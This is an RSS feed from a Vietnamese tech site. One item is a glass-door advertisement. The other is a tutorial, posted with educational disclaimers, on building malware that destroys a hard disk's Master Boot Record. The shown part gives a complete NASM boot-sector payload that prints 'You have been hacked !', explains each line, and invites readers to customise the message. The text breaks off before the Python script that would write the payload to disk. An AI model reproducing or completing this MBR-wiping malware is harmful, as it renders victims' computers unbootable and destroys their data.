<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	 xmlns:media="http://search.yahoo.com/mrss/" >

<channel>
	<title>phòng &#8211; AnonyViet &#8211; English Version</title>
	<atom:link href="https://en.anonyviet.com/tag/phong/feed/" rel="self" type="application/rss+xml" />
	<link>https://en.anonyviet.com</link>
	<description>The most popular website for sharing information technology, computer networks, and security knowledge. Stay up to date with the hottest news and tips</description>
	<lastBuildDate>Mon, 08 Jan 2024 03:34:26 +0000</lastBuildDate>
	<language>en-US</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=7.0.2</generator>

<image>
	<url>https://en.anonyviet.com/wp-content/uploads/2023/01/cropped-ico-logo-75x75-1.png</url>
	<title>phòng &#8211; AnonyViet &#8211; English Version</title>
	<link>https://en.anonyviet.com</link>
	<width>32</width>
	<height>32</height>
</image> 
	<item>
		<title>Viet Phong specializes in providing tempered glass doors and glass walls for all projects</title>
		<link>https://en.anonyviet.com/viet-phong-specializes-in-providing-tempered-glass-doors-and-glass-walls-for-all-projects/</link>
					<comments>https://en.anonyviet.com/viet-phong-specializes-in-providing-tempered-glass-doors-and-glass-walls-for-all-projects/#respond</comments>
		
		<dc:creator><![CDATA[AnonyViet]]></dc:creator>
		<pubDate>Mon, 08 Jan 2024 03:34:26 +0000</pubDate>
				<category><![CDATA[Knowledge]]></category>
		<category><![CDATA[doors]]></category>
		<category><![CDATA[Glass]]></category>
		<category><![CDATA[phòng]]></category>
		<category><![CDATA[projects]]></category>
		<category><![CDATA[providing]]></category>
		<category><![CDATA[specializes]]></category>
		<category><![CDATA[tempered]]></category>
		<category><![CDATA[Việt]]></category>
		<category><![CDATA[walls]]></category>
		<guid isPermaLink="false">https://en.anonyviet.com/?p=14334</guid>

					<description><![CDATA[Tempered glass door is an ideal choice for construction projects, houses, offices, companies,&#8230; bringing luxurious beauty, modernity and safety to users. Join the channel Telegram belong to AnonyViet 👉 Link 👈 What is tempered glass door? Tempered glass doors are doors made from tempered glass. This type of glass is produced by heating regular glass [&#8230;]]]></description>
										<content:encoded><![CDATA[
<div id="ftwp-postcontent">
<p><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fcuakinhre.com%2Fcua-kinh-cuong-luc%2F" rel="noopener" class="local-link"><b>Tempered glass door</b></a><b>  is an ideal choice for construction projects, houses, offices, companies,&#8230; bringing luxurious beauty, modernity and safety to users.</b></p>
<div class="code-block code-block-16" style="margin: 8px 0; clear: both;">
<div align="center">
<table class=" aligncenter" style="background-color: #c0c0c0; border-collapse: collapse; width: 59.9985%;">
<tbody>
<tr>
<td style="width: 100%; text-align: center;"><span style="font-size: 12pt;"><strong>Join the channel <span style="color: #0000ff;">Telegram</span> belong to <span style="color: #008080;">AnonyViet</span> 👉 <span style="text-decoration: underline;"><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Ft.me%2Fanonyvietoffical" class="local-link" rel="noopener">Link</a></span>  👈</strong></span></td>
</tr>
</tbody>
</table>
</div>
</div>
<h2 id="ftoc-cua-kinh-cuong-luc-la-gi" class="ftwp-heading"><span style="font-weight: 400;">What is tempered glass door?</span></h2>
<p><span style="font-weight: 400;">Tempered glass doors are doors made from tempered glass. This type of glass is produced by heating regular glass up to a temperature of 700 &#8211; 750 degrees Celsius, then cooling it suddenly with a stream of compressed air.  This process makes tempered glass 5-7 times harder, more force-resistant and heat-resistant than regular glass.</span></p>
<h2 id="ftoc-uu-diem-vuot-troi-cua-cua-kinh-cuong-luc-so-voi-nhung-loai-cua-truyen-thong" class="ftwp-heading"><span style="font-weight: 400;">Outstanding advantages of tempered glass doors compared to traditional types</span></h2>
<h3 id="ftoc-kha-nang-chiu-luc-chiu-nhiet-cao" class="ftwp-heading"><span style="font-weight: 400;">High strength and heat resistance</span></h3>
<p><span style="font-weight: 400;"> Tempered glass has the ability to withstand 5-7 times more force than normal glass, and 3 times more heat resistance than normal glass.  This makes tempered glass doors safer, avoiding impacts and strong impacts.</span></p>
<h3 id="ftoc-do-ben-cao" class="ftwp-heading"><span style="font-weight: 400;">Durable</span></h3>
<p><span style="font-weight: 400;">Tempered glass is highly durable and will not fade, crack, or yellow over time.  The greater the thickness of tempered glass, the more durable it is.  Tempered glass thickness usually ranges from 8mm to 19mm, depending on installation location and usage needs.</span></p>
<p><span style="font-weight: 400;">According to experts, under ideal usage conditions, high-quality tempered glass doors will have a maximum durability of about 20-35 years.  However, in reality, to achieve this number, in addition to high-quality materials, the way the product is used is also very important.</span></p>
<figure id="attachment_54568" aria-describedby="caption-attachment-54568" style="width: 566px" class="wp-caption aligncenter"><img post-id="14334" fifu-featured="1" loading="lazy" decoding="async" class="size-full wp-image-54568" src="https://anonyviet.com/wp-content/uploads/2024/01/kinh.jpg" alt="Viet Phong specializes in providing tempered glass doors and glass walls for all projects" title="Viet Phong specializes in providing tempered glass doors and glass walls for all projects" width="566" height="375" title="Viet Phong specializes in providing tempered glass doors and glass walls for all projects 4" srcset="https://anonyviet.com/wp-content/uploads/2024/01/kinh.jpg 566w, https://anonyviet.com/wp-content/uploads/2024/01/kinh-300x199.jpg 300w" sizes="auto, (max-width: 566px) 100vw, 566px"/><figcaption id="caption-attachment-54568" class="wp-caption-text">Tempered glass doors are installed in many construction projects.</figcaption></figure>
<h3 id="ftoc-tinh-tham-my-cao" class="ftwp-heading"><span style="font-weight: 400;">High aesthetics</span></h3>
<p><span style="font-weight: 400;">Tempered glass doors bring luxurious, modern beauty to the space.  Tempered glass doors can be used for many different locations in the building, from doors, windows, bathroom doors,&#8230; to partitions, stairs,&#8230; Depending on the installation location and usage needs. You can choose the type of tempered glass door that suits your preferences and architectural style.</span></p>
<p><b>Easy to clean</b></p>
<p><span style="font-weight: 400;">Tempered glass doors have a smooth surface, without ridges or grooves, so they are easy to clean.  You can use clean water and a soft towel.  This is the simplest and most effective cleaning method.  You just need to dilute clean water with a little dishwashing liquid, then use a soft cloth to absorb the solution and wipe the glass surface.</span></p>
<h2 id="ftoc-cac-loai-cua-kinh-cuong-luc-pho-bien-hien-nay" class="ftwp-heading"><span style="font-weight: 400;">Popular types of tempered glass doors today</span></h2>
<p><span style="font-weight: 400;">Tempered glass doors are widely used in construction projects, houses, offices, companies,&#8230; with many different types such as:</span></p>
<p><span style="font-weight: 400;">Revolving tempered glass doors: This is the most popular type of tempered glass door, used for doors and windows.</span></p>
<p><span style="font-weight: 400;">Sliding tempered glass door: This type of door helps save space, often used for bathroom doors and toilet doors.</span></p>
<figure id="attachment_54569" aria-describedby="caption-attachment-54569" style="width: 633px" class="wp-caption aligncenter"><img loading="lazy" decoding="async" class="size-full wp-image-54569" src="https://anonyviet.com/wp-content/uploads/2024/01/kinh2.jpg" alt="Viet Phong specializes in providing tempered glass doors and glass walls for all projects 5" width="633" height="450" title="Viet Phong specializes in providing tempered glass doors and glass walls for all projects 5" srcset="https://anonyviet.com/wp-content/uploads/2024/01/kinh2.jpg 633w, https://anonyviet.com/wp-content/uploads/2024/01/kinh2-300x213.jpg 300w, https://anonyviet.com/wp-content/uploads/2024/01/kinh2-120x86.jpg 120w, https://anonyviet.com/wp-content/uploads/2024/01/kinh2-350x250.jpg 350w" sizes="auto, (max-width: 633px) 100vw, 633px"/><figcaption id="caption-attachment-54569" class="wp-caption-text">A type of tempered glass sliding door.</figcaption></figure>
<p><span style="font-weight: 400;">Sliding tempered glass doors: This type of door has the ability to open and close flexibly, often used for doors and windows.</span></p>
<p><span style="font-weight: 400;">Automatic tempered glass doors: This type of door uses an automatic control system, often used for doors and elevator doors.</span></p>
<h2 id="ftoc-nhung-luu-y-khi-lua-chon-cua-kinh-cuong-luc" class="ftwp-heading"><span style="font-weight: 400;">Things to note when choosing tempered glass doors</span></h2>
<p><span style="font-weight: 400;">Glass thickness: Tempered glass thickness usually ranges from 8mm to 19mm, depending on installation location and usage needs.</span></p>
<p><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-54570" src="https://anonyviet.com/wp-content/uploads/2024/01/kinh3.jpg" alt="Viet Phong specializes in providing tempered glass doors and glass walls for all projects 6" width="548" height="546" title="Viet Phong specializes in providing tempered glass doors and glass walls for all projects 6" srcset="https://anonyviet.com/wp-content/uploads/2024/01/kinh3.jpg 548w, https://anonyviet.com/wp-content/uploads/2024/01/kinh3-300x300.jpg 300w, https://anonyviet.com/wp-content/uploads/2024/01/kinh3-150x150.jpg 150w, https://anonyviet.com/wp-content/uploads/2024/01/kinh3-75x75.jpg 75w, https://anonyviet.com/wp-content/uploads/2024/01/kinh3-350x350.jpg 350w" sizes="auto, (max-width: 548px) 100vw, 548px"/></p>
<p><span style="font-weight: 400;">Door size: The size of the tempered glass door needs to be suitable for the installation location, ensuring safety and convenience for use.</span></p>
<p><span style="font-weight: 400;">Glass color: Tempered glass comes in many different colors, you can choose depending on your preferences and architectural style.</span></p>
<p><span style="font-weight: 400;">Door accessories: Tempered glass door accessories need to ensure quality and ensure safety for users.</span></p>
<h2 id="ftoc-viet-phong-cong-ty-cung-cap-cua-kinh-cuong-luc-uy-tin" class="ftwp-heading"><span style="font-weight: 400;">Viet Phong &#8211; a reputable company providing tempered glass doors</span></h2>
<p><span style="font-weight: 400;">Viet Phong is one of the leading reputable companies providing tempered glass doors in Hanoi and the Northern provinces.  The company has many years of experience in the field of manufacturing and installing tempered glass doors, with a team of professional and highly skilled staff.  Viet Phong provides a variety of tempered glass doors, from revolving tempered glass doors, sliding tempered glass doors, sliding tempered glass doors, automatic tempered glass doors,&#8230; to suit all customer needs. row.</span></p>
<p><span style="font-weight: 400;">Viet Phong Company is committed to providing high quality tempered glass door products at competitive prices.  The company also has a thoughtful product warranty and maintenance policy, ensuring customers&#39; rights.</span></p>
<ul>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">High product quality: Viet Phong uses high quality tempered glass from reputable manufacturers, ensuring durability, safety and aesthetics.</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Professional staff: Viet Phong&#39;s staff has many years of experience in the field of manufacturing and installing tempered glass doors, ensuring to bring customers high quality products, properly installed. art.</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Competitive prices: Viet Phong provides tempered glass door products at competitive prices, suitable for all customer needs.</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Thoughtful warranty and maintenance policy: Viet Phong has a thoughtful product warranty and maintenance policy, ensuring customer benefits.</span></li>
</ul>
<p><span style="font-weight: 400;">If you are looking for a company that provides tempered glass doors, </span><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fcuakinhre.com%2Fvach-kinh%2F" rel="noopener" class="local-link"><span style="font-weight: 400;">Glass edge</span></a><span style="font-weight: 400;">  With reputation and high quality, Viet Phong is a perfect choice.</span></p>
<p><span style="font-weight: 400;">For further information, please contact: </span></p>
<p><span style="font-weight: 400;">VIET PHONG PRODUCTION TRADING AND CONSTRUCTION COMPANY LIMITED</span></p>
<p><span style="font-weight: 400;">Address: No. 154 Linh Nam Street, Vinh Hung Ward, Hoang Mai District, Hanoi City.</span></p>
<p><span style="font-weight: 400;">Website: https://cuakinhre.com/.</span></p>
<p><span style="font-weight: 400;">Hotline: 0912 876 339 – 0978 6600 39.</span></p>
<p><span style="font-weight: 400;">Email: <a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fcdn-cgi%2Fl%2Femail-protection" class="__cf_email__" data-cfemail="98eef1fdece8f0f7f6ffa9aaaed8fff5f9f1f4b6fbf7f5" rel="noopener">[email protected]</a>.</span></p>
<div class="kk-star-ratings kksr-auto kksr-align-right kksr-valign-bottom" data-payload="{&quot;align&quot;:&quot;right&quot;,&quot;id&quot;:&quot;54567&quot;,&quot;slug&quot;:&quot;default&quot;,&quot;valign&quot;:&quot;bottom&quot;,&quot;ignore&quot;:&quot;&quot;,&quot;reference&quot;:&quot;auto&quot;,&quot;class&quot;:&quot;&quot;,&quot;count&quot;:&quot;100&quot;,&quot;legendonly&quot;:&quot;&quot;,&quot;readonly&quot;:&quot;&quot;,&quot;score&quot;:&quot;5&quot;,&quot;starsonly&quot;:&quot;&quot;,&quot;best&quot;:&quot;5&quot;,&quot;gap&quot;:&quot;5&quot;,&quot;greet&quot;:&quot;\u0110\u00e1nh gi\u00e1 b\u00e0i vi\u1ebft post&quot;,&quot;legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: 5\/5 - (100 b\u00ecnh ch\u1ecdn)&quot;,&quot;size&quot;:&quot;24&quot;,&quot;title&quot;:&quot;Vi\u1ec7t Phong chuy\u00ean cung c\u1ea5p c\u1eeda k\u00ednh c\u01b0\u1eddng l\u1ef1c, v\u00e1ch k\u00ednh cho m\u1ecdi c\u00f4ng tr\u00ecnh&quot;,&quot;width&quot;:&quot;142.5&quot;,&quot;_legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: {score}\/{best} - ({count} {votes})&quot;,&quot;font_factor&quot;:&quot;1.25&quot;}">
<p>  The article scored: 5/5 &#8211; (100 votes)</p>
</div>
</div>
]]></content:encoded>
					
					<wfw:commentRss>https://en.anonyviet.com/viet-phong-specializes-in-providing-tempered-glass-doors-and-glass-walls-for-all-projects/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<media:content url="https://anonyviet.com/wp-content/uploads/2024/01/kinh.jpg" medium="image"></media:content>
            	</item>
		<item>
		<title>Code phá hủy MBR ổ cứng &#8211; Tấn công và phòng chống</title>
		<link>https://en.anonyviet.com/code-pha-huy-mbr-o-cung-tan-cong-va-phong-chong/</link>
					<comments>https://en.anonyviet.com/code-pha-huy-mbr-o-cung-tan-cong-va-phong-chong/#respond</comments>
		
		<dc:creator><![CDATA[AnonyViet]]></dc:creator>
		<pubDate>Sun, 19 Feb 2023 07:44:42 +0000</pubDate>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[chống]]></category>
		<category><![CDATA[Code]]></category>
		<category><![CDATA[công]]></category>
		<category><![CDATA[cùng]]></category>
		<category><![CDATA[hủy]]></category>
		<category><![CDATA[MBR]]></category>
		<category><![CDATA[ổ]]></category>
		<category><![CDATA[phá]]></category>
		<category><![CDATA[phòng]]></category>
		<category><![CDATA[Tấn]]></category>
		<category><![CDATA[và]]></category>
		<guid isPermaLink="false">https://en.anonyviet.com/?p=11399</guid>

					<description><![CDATA[Đây là một chủ đề “khá nhạy cảm” và “nguy hiểm” và mình muốn khẳng định rằng mình không khuyến khích hoặc ủng hộ việc viết mã độc hoặc bất kỳ hành vi vi phạm pháp luật nào. Tuy nhiên, để hiểu được cách thức hoạt động của mã độc và bảo vệ chính mình [&#8230;]]]></description>
										<content:encoded><![CDATA[
<div id="ftwp-postcontent">
<p><strong>Đây là một chủ đề “khá nhạy cảm” và “nguy hiểm” và mình muốn khẳng định rằng mình không khuyến khích hoặc ủng hộ việc viết mã độc hoặc bất kỳ hành vi vi phạm pháp luật nào. Tuy nhiên, để hiểu được cách thức hoạt động của mã độc và bảo vệ chính mình khỏi nó, mình đã tìm hiểu về nó. Trong bài viết này, mình sẽ chia sẻ với bạn về cách mà mình đã tạo ra một đoạn mã độc và sử dụng nó để phá huỷ dữ liệu trên ổ cứng chỉ với 1 tập lệnh Python.</strong></p>
<div class="code-block code-block-16" style="margin: 8px 0; clear: both;">
<div align="center">
<table class=" aligncenter" style="background-color: #c0c0c0; border-collapse: collapse; width: 59.9985%;">
<tbody>
<tr>
<td style="width: 100%; text-align: center;"><span style="font-size: 12pt;"><strong>Tham gia kênh <span style="color: #0000ff;">Telegram</span> của <span style="color: #008080;">AnonyViet </span> 👉 <span style="text-decoration: underline;"><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Ft.me%2Fanonyvietchat" class="local-link" rel="noopener">Link</a></span> 👈</strong></span></td>
</tr>
</tbody>
</table>
</div>
</div>
<p><strong>An0nyviet hy vọng rằng bài viết này sẽ giúp bạn hiểu rõ hơn về cách thức hoạt động của mã độc và cách bảo vệ chính mình khỏi nó. Mình sẽ chia sẻ cách tạo ra một phần mềm độc hại MBR. Trước khi vào vấn đề đó mình sẽ nói qua khái niệm về MBR và cách hoạt động của nó.</strong></p>
<p style="text-align: center;"><span style="color: #ff0000;"><strong>Lưu ý: Bài viết chỉ mang tính chất giáo dục, nghiên cứu về mã độc, vui lòng không thực hiện các cuộc tấn công phạm pháp nào. Anonyviet không chịu toàn bộ trách nhiệm mà bạn đã gây ra !</strong></span></p>
<h2 id="ftoc-mbr-la-gi-cach-hoat-dong-cua-mbr" class="ftwp-heading"><span style="font-size: 18pt; color: #0000ff;"><strong>MBR là gì ? Cách hoạt động của MBR</strong></span></h2>
<p><strong>MBR</strong> ( <strong>Master Boot Record</strong>: <em><strong>Bản ghi khởi động chính </strong></em>), là một phần của đĩa cứng được sử dụng để khởi động hệ thống máy tính. Nó là một khối dữ liệu 512 byte đầu tiên trên ổ đĩa cứng được sử dụng để lưu trữ thông tin về cách phân vùng đĩa cứng và cách khởi động hệ thống. Trong MBR, có một bảng phân vùng chứa thông tin về các phân vùng trên đĩa cứng, bao gồm địa chỉ bắt đầu và kích thước của mỗi phân vùng. Nó cũng chứa mã khởi động ( <strong>bootloader</strong> ) để hệ thống có thể khởi động từ ổ đĩa cứng. Ngoài ra nó còn chứa một chữ ký ( <strong>signature </strong>) với kích cỡ 2 byte ở cuối để xác nhận rằng nó là MBR hợp lệ và giúp hệ điều hành nhận diện đĩa cứng. Tuy nhiên, MBR cũng là điểm yếu của hệ thống bởi vì nó có thể bị tấn công bởi mã độc và phá hỏng thông tin về phân vùng và cách khởi động hệ thống, gây ra các vấn đề nghiêm trọng khi khởi động hệ thống.</p>
<p><strong>Cách hoạt động của MBR:</strong> Khi hệ thống được bật, trình điều khiển BIOS (<strong>Basic Input/Output System</strong>) sẽ đọc MBR từ ổ đĩa cứng và tải nó vào bộ nhớ. Mã khởi động (bootloader) trong MBR sẽ được thực thi, cho phép hệ thống khởi động từ ổ đĩa cứng. Sau đó, Bootloader sẽ tải phần mềm khởi động tiếp theo (như <a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fvi.wikipedia.org%2Fwiki%2FGRUB" rel="noopener" class="local-link">GRUB</a> hoặc <a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fvi.wikipedia.org%2Fwiki%2FNTLDR" rel="noopener" class="local-link">NTLDR</a>) và cho phép người dùng chọn hệ điều hành để khởi động. Nếu không có lựa chọn, bootloader sẽ tiếp tục thực thi và chuyển quyền điều khiển cho hệ điều hành. Nếu MBR bị hỏng hoặc bị tấn công bởi mã độc, bootloader có thể không thể được tải hoặc hệ thống sẽ không khởi động được. Trong trường hợp này, bạn cần phải sử dụng các công cụ phục hồi hệ thống để sửa chữa hoặc khôi phục lại MBR để đảm bảo hệ thống có thể khởi động được lại.</p>
<h2 id="ftoc-minh-da-tao-ra-ma-doc-mbr-pha-huy-o-cung-nhu-the-nao" class="ftwp-heading"><span style="color: #0000ff; font-size: 18pt;"><strong>Mình đã tạo ra mã độc MBR phá hủy ổ cứng như thế nào ?</strong></span></h2>
<p>Để tạo ra được mã độc này, An0nyViet đã tìm hiểu những kiến thức sau:</p>
<ul>
<li><strong><em>Ngôn ngữ lập trình</em> <em>Assembler</em></strong>: đây là một ngôn ngữ lập trình gần với ngôn ngữ máy và cung cấp một phương tiện để lập trình trực tiếp các lệnh máy tính. Nó cung cấp các lệnh khá đơn giản về việc thực hiện các tác vụ cơ bản như tính toán, lưu trữ và điều khiển và mình thường thấy các lập trình viên dùng ngôn ngữ này để viết ra các phần mềm yêu cầu xử lý tốc độ nhanh</li>
<li><em><strong>Qemu</strong></em>: là chương trình mô phỏng hệ thống (System Emulator) miễn phí và mã nguồn mở, cho phép người dùng chạy các hệ điều hành và phần mềm trong một môi trường ảo trên các nền tảng khác nhau. Nó mô phỏng một loạt các kiến trúc máy tính bao gồm các CPU phổ biến như x86, ARM, PowerPC, SPARC, và MIPS, cũng như các hệ điều hành như MacOS, Windows, và Linux</li>
<li><em><strong>Netwide Assembler</strong></em>:  viết tắt là “NASM” là một trình dịch ngược mã (<strong>Assembler</strong>) mã nguồn mở, được sử dụng để chuyển đổi mã assembly (ngôn ngữ lập trình gần với ngôn ngữ máy như mình đã nói ở trên) thành mã máy. NASM hỗ trợ nhiều kiến trúc máy tính, bao gồm các kiến trúc phổ biến như x86 và x86-64 (bao gồm cả 32-bit và 64-bit), ARM, PowerPC,…. Nó được sử dụng trong nhiều dự án phần mềm mã nguồn mở, bao gồm các hệ điều hành như Linux và FreeBSD, và các công cụ và ứng dụng như bootloader và các ứng dụng mã hóa.</li>
<li><em><strong>Ngôn ngữ lập trình Python</strong></em>: Đây là một ngôn ngữ lập trình khá nhiều anh em được biết và được học rồi nhỉ, được biết Python nổi tiếng về cú pháp đơn giản, dễ đọc, dễ hiểu, và dễ học. Hiện tại Python đang được phát triển và được dạy trong chương trình THPT. Python là ngôn ngữ lập trình thông dịch, được sử dụng rộng rãi trong nhiều lĩnh vực khác nhau.  Và đó cũng là lí do mình lựa chọn Python để viết ra mã độc MBR nhằm dễ đọc và dễ hiểu hơn</li>
</ul>
<p>Trước tiên mình download <a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fqemu.weilnetz.de%2Fw64%2F" rel="noopener external nofollow" class="ext-link" onclick="this.target='_blank';">Qemu Binaries</a> và <a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fwww.nasm.us%2Fpub%2Fnasm%2Freleasebuilds%2F2.16.01%2F" rel="noopener external nofollow" class="ext-link" onclick="this.target='_blank';">NASM</a>. Việc cài đặt 2 phần mềm này khá đơn giản nên mình sẽ bỏ qua nhé. Bây giờ mình sẽ tiến hành tạo một tên tệp với bản định dạng của ngôn ngữ Assembler là .asm. Mình đặt tên file là <strong>boot.asm</strong> nhé</p>
<h3 id="ftoc-buoc-1-tao-tep-boot-asm-va-bien-dich-sang-ma-hex-doc" class="ftwp-heading"><span style="font-size: 14pt;"><strong><span style="color: #008000;">Bước 1: Tạo tệp boot.asm và biên dịch sang mã hex độc</span></strong></span></h3>
<p><img fetchpriority="high" decoding="async" class="aligncenter wp-image-45230 size-full" src="https://anonyviet.com/wp-content/uploads/2023/02/carbon.png" alt="Code phá hủy MBR ổ cứng - Tấn công và phòng chống 12" width="1364" height="1242" srcset="https://anonyviet.com/wp-content/uploads/2023/02/carbon.png 1364w, https://anonyviet.com/wp-content/uploads/2023/02/carbon-300x273.png 300w, https://anonyviet.com/wp-content/uploads/2023/02/carbon-1024x932.png 1024w, https://anonyviet.com/wp-content/uploads/2023/02/carbon-768x699.png 768w, https://anonyviet.com/wp-content/uploads/2023/02/carbon-750x683.png 750w, https://anonyviet.com/wp-content/uploads/2023/02/carbon-1140x1038.png 1140w" sizes="(max-width: 1364px) 100vw, 1364px" title="Code phá hủy MBR ổ cứng - Tấn công và phòng chống 15"/></p>
<pre class="EnlighterJSRAW" data-enlighter-language="asm">org 0x7c00 &#13;
bits 16    &#13;
&#13;
&#13;
start:&#13;
    call cls &#13;
    mov bx, display&#13;
&#13;
print:&#13;
    mov al, [bx]&#13;
    cmp al, 0 &#13;
    je halt&#13;
    call print_char &#13;
    inc bx&#13;
    jmp print &#13;
&#13;
print_char:&#13;
    mov ah, 0x0e&#13;
    int 0x10 &#13;
    ret &#13;
&#13;
halt:&#13;
    ret&#13;
&#13;
&#13;
cls:&#13;
    mov ah, 0x07   &#13;
    mov al, 0x00  &#13;
    mov bh, 0x02&#13;
    mov cx, 0x00  &#13;
    mov dx, 0x184f&#13;
    int 0x10       &#13;
    ret            &#13;
&#13;
display db "We are Anonyviet.com, I am Hevin", 13, 10, "You have been hacked !", 13, 10, 0&#13;
times 510 - ($ - $$) db 0&#13;
dw 0xaa55 &#13;
</pre>
<p><strong>Đoạn code trên là một chương trình boot loader, được tạo ra để chạy trên một máy tính x86 sau khi khởi động. Bây giờ chúng mình hãy cùng đi vào từng đoạn code để hiểu rõ hơn nha:</strong></p>
<p>Dòng đầu tiên <code>org 0x7c00</code> chỉ định vị trí lưu trữ của chương trình khi nó được nạp vào bộ nhớ, và địa chỉ này được xác định là <code>0x7c00</code>. Dòng thứ 2 chính là <code>bits 16</code> chỉ định rằng chương trình này sẽ được biên dịch và chạy trên kiến trúc 16Bit</p>
<pre class="EnlighterJSRAW" data-enlighter-language="asm">org 0x7c00&#13;
bits 16</pre>
<p>Chương trình bắt đầu bằng nhãn <code>start</code> và thực hiện các lệnh. Lệnh đầu tiên gọi hàm <code>cls</code> để xóa màn hình. Lệnh thứ hai đưa địa chỉ của chuỗi <code>display</code> vào thanh ghi <code>bx</code></p>
<pre class="EnlighterJSRAW" data-enlighter-language="asm">start:&#13;
     call cls&#13;
     mov bx, display</pre>
<p>Đoạn mã này lặp lại cho đến khi kết thúc chuỗi <code>display</code>. Mỗi lần lặp lại, nó đọc một ký tự từ chuỗi <code>display</code> và gọi hàm <code>print_char</code> để in ký tự đó ra màn hình. Sau đó, nó tăng giá trị của thanh ghi <code>bx</code> để trỏ đến ký tự tiếp theo trong chuỗi <code>display</code> và lặp lại quá trình này.</p>
<pre class="EnlighterJSRAW" data-enlighter-language="asm">print:&#13;
     mov al, [bx]&#13;
     cmp al, 0&#13;
     je halt&#13;
     call print_char&#13;
     inc bx&#13;
     jmp print</pre>
<p>Hàm <code>print_char</code> đặt giá trị <code>0x0e</code> vào thanh ghi <code>ah</code>, sau đó gọi trình ngắt <code>0x10</code> để hiển thị ký tự tương ứng với thanh ghi <code>al</code> lên màn hình. Tiếp đến, nó sẽ trả về ngay lập tức.</p>
<pre class="EnlighterJSRAW" data-enlighter-language="asm">print_char:&#13;
     mov ah, 0x0e&#13;
     int 0x10&#13;
     ret</pre>
<p>Hàm <code>halt</code> chỉ đơn giản là trả về ngay lập tức.</p>
<pre class="EnlighterJSRAW" data-enlighter-language="asm">halt:&#13;
     ret</pre>
<p><code>cls</code> là một hàm để xóa màn hình<br /><code>mov ah, 0x07</code>: Di chuyển giá trị <code>0x07</code> vào thanh ghi <code>ah</code>, là mã hàm ẩn bảng ký tự của BIOS để xoá màn hình.<br /><code>mov al, 0x00</code>: Di chuyển giá trị <code>0x00</code> vào thanh ghi <code>al</code>, là thông số mặc định để xoá màn hình.<br /><code>mov bh, 0x02</code>: Di chuyển giá trị <code>0x02</code> vào thanh ghi <code>bh,</code> là mã màu sắc của ký tự trên màn hình console.Trong trường hợp này, màu sắc được chọn là màu xanh lá cây được biểu thị bằng mã nhị phân. Bạn có thể xem các danh sách màu chữ của BIOS <a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fen.wikipedia.org%2Fwiki%2FBIOS_color_attributes" rel="noopener external nofollow" class="ext-link" onclick="this.target='_blank';">tại đây</a><br /><code>mov cx, 0x00</code>: Di chuyển giá trị <code>0x00</code> vào thanh ghi <code>cx</code>, là số lần hiển thị để xoá màn hình.<br /><code>mov dx, 0x184f</code>: Di chuyển giá trị <code>0x184f</code> vào thanh ghi <code>dx</code>, là tọa độ bắt đầu xoá màn hình với x = 0 và y =0<br /><code>int 0x10</code>: Gọi hàm ngắt số <code>0x10</code>, là hàm giao tiếp với phần cứng video của máy tính.<br /><code>ret</code>: Trả về hàm và quay trở lại nơi gọi hàm.</p>
<pre class="EnlighterJSRAW" data-enlighter-language="asm">cls:&#13;
     mov ah, 0x07&#13;
     mov al, 0x00&#13;
     mov bh, 0x02&#13;
     mov cx, 0x00&#13;
     mov dx, 0x184f&#13;
     int 0x10&#13;
     ret</pre>
<p><code>display</code> là tên biến, <code>db</code> là instruction để định nghĩa một chuỗi byte.<br />Chuỗi được định nghĩa bao gồm: <code>"We are Anonyviet.com, I am Hevin", 13, 10, "You have been hacked !", 13, 10, 0</code> và bạn cũng có thể thay đổi lời nhắn tùy ý nhé !</p>
<p>Ở đây <code>"We are Anonyviet.com, I am Hevin"</code> là một chuỗi ký tự, trong trường hợp này là thông điệp được hiển thị trên màn hình</p>
<p>Còn <code>13</code> và <code>10</code> lần lượt là các ký tự ASCII tương ứng với các ký tự xuống dòng và lùi về đầu dòng (Carriage Return và Line Feed).<br /><code>"You have been hacked !"</code> là thông điệp tiếp theo được hiển thị trên màn hình. <code>0</code> là ký tự kết thúc chuỗi.<br /><code>times 510 - ($ - $$) db 0</code> sử dụng lệnh <code>times</code> để bổ sung các byte giá trị 0 vào phần còn thiếu của boot sector (tính từ đầu cho tới vị trí 510).<br /><code>dw 0xaa55</code> giá trị kết thúc của boot sector là <code>0xAA55</code>, giá trị này sẽ được BIOS sử dụng để kiểm tra tính hợp lệ của boot sector trước khi nạp vào bộ nhớ và thực thi</p>
<pre class="EnlighterJSRAW" data-enlighter-language="asm">display db "We are Anonyviet.com, I am Hevin", 13, 10, "You have been hacked !", 13, 10, 0&#13;
times 510 - ($ - $$) db 0&#13;
dw 0xaa55</pre>
<h4 id="ftoc-cach-hoat-dong-cua-chuong-trinh-pha-huy-mbr-o-cung-tren-nhu-sau" class="ftwp-heading"><code/><strong>Cách hoạt động của chương trình phá hủy MBR ổ cứng trên như sau:</strong></h4>
